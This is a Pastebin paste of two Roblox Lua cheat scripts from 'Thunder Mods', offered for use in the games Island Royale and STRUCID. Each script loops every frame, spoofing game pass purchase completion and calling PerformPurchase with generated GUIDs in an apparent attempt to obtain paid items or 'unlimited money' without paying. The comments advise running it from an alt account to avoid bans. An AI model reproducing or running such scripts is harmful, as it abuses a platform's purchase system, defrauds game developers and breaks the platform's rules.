Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Thunder Mods Loves you, Now love Thunder Mods back by subscribing and turning on notifications..
- local gamePassId = 6131490
- local market = game:GetService("MarketplaceService")
- local http = game:GetService("HttpService")
- local info = market:GetProductInfo(gamePassId, Enum.InfoType.GamePass)
- game:GetService("RunService").Stepped:connect(function()
- market:SignalPromptGamePassPurchaseFinished(game:GetService("Players").LocalPlayer, gamePassId, true)
- market:PerformPurchase(Enum.InfoType.Asset, info["ProductId"], info["PriceInRobux"], http:GenerateGUID(false))
- end)
- ----------------------------------------------------------------------------------------------------------------------------
- -- Script for island royale got patched real quick just after I released it but fear not. i got another,
- -- OP Script for you guys for STRUCID. IT WILL GIVE U UNLIMITED MONEY
- -- EXECUTE THIS IN STRUCID FROM ALT ACCOUNT AND HAIL THUNDER MODS
- local gamePassId = 5265144
- local market = game:GetService("MarketplaceService")
- local http = game:GetService("HttpService")
- local info = market:GetProductInfo(gamePassId, Enum.InfoType.GamePass)
- game:GetService("RunService").Stepped:connect(function()
- market:SignalPromptGamePassPurchaseFinished(game:GetService("Players").LocalPlayer, gamePassId, true)
- market:PerformPurchase(Enum.InfoType.Asset, info["ProductId"], info["PriceInRobux"], http:GenerateGUID(false))
- end)
Add Comment
Please, Sign In to add comment